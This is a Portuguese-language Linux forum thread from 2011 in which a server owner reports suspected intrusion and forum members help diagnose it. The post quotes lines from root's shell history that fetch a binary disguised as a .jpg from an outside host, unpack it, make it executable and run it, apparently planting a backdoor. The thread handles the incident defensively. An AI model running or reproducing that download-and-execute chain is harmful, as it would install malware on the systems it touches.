Invasão ?

bob
(usa Slackware)

Enviado em 24/01/2011 - 17:56h

Galera do vol...

Entrei em uns dos meus servidores de internet hoje e encontrei processos estranhos rodando, fui até o .bash_hystory do root e encontrei isso.

get http://pinky.clan.su/altele/screen.jpg
tar zxvf screen.jpg ; rm -rf screen.jpg
chmod +x screen
./screen

Depois de parar os processos e excluir estes arquivos fiz o mesmo procedimento e ele gera um arquivo screen, o que sera que é isso, foi um invasão ?

Processos estranhos que estavão rodandos>>>> ./screen e varios ./rdp

Valeu

pinduvoz
(usa Debian)

Enviado em 24/01/2011 - 18:09h

Esse arquivo screen é um executável (binário), pelo que eu vi baixando-o aqui.

Não dá para ter idéia do que ele faz ou possa fazer a não ser rodando-o.

renato_pacheco
(usa Debian)

Enviado em 24/01/2011 - 23:17h

Rá! Não digo q é vírus em si, mas um malware. O kra q invadiu seu server tá colocando backdoors pra acessar posteriormente. Faça um teste: execute o seguinte comando:

# netstat -antp

E veja esses executáveis. Quais portas eles abriram?

pinduvoz
(usa Debian)

Enviado em 24/01/2011 - 23:48h

RDP seria isso:

<<Remote Desktop Protocol (ou somente RDP) é um protocolo multi-canal que permite que um usuário conecte a um computador rodando o Microsoft Terminal Services. Existem clientes para a maioria das versões do Windows, e outros sistemas operacionais como o Linux. O servidor escuta por padrão a porta TCP 3389.

Baseado no protocolo da ITU T.share (conhecido como T.128), a primeira versão do RDP (chamada versão 4.0) foi introduzida com o Terminal Services no Windows NT 4.0 Server, Terminal Server Edition. A versão 5.0 introduzida com o Windows 2000 Server adicionou suporte para alguns recursos incluindo impressão em impressoras locais e foi voltado para melhorar o uso da banda. A versão 5.1, lançada com o Windows XP inclui vários recursos como suporte a cor em 24-bits e som.>> - http://pt.wikipedia.org/wiki/Remote_Desktop_Protocol.

Se for é "backdoor", com certeza.

bob
(usa Slackware)

Enviado em 25/01/2011 - 14:31h

Fiz o que disse com o netstat e nao tem nada de estranho no momento, limpei tudo que encontrei sobre os arquivos, troquei s senha do root e fiz testes de portas no firewall e esta tudo na sua normalidade, mas como isso pode ter acontecido ? estou preocupado devo fazer mais alguma coisa ?

renato_pacheco
(usa Debian)

Enviado em 25/01/2011 - 14:46h

Resta agora é monitorar...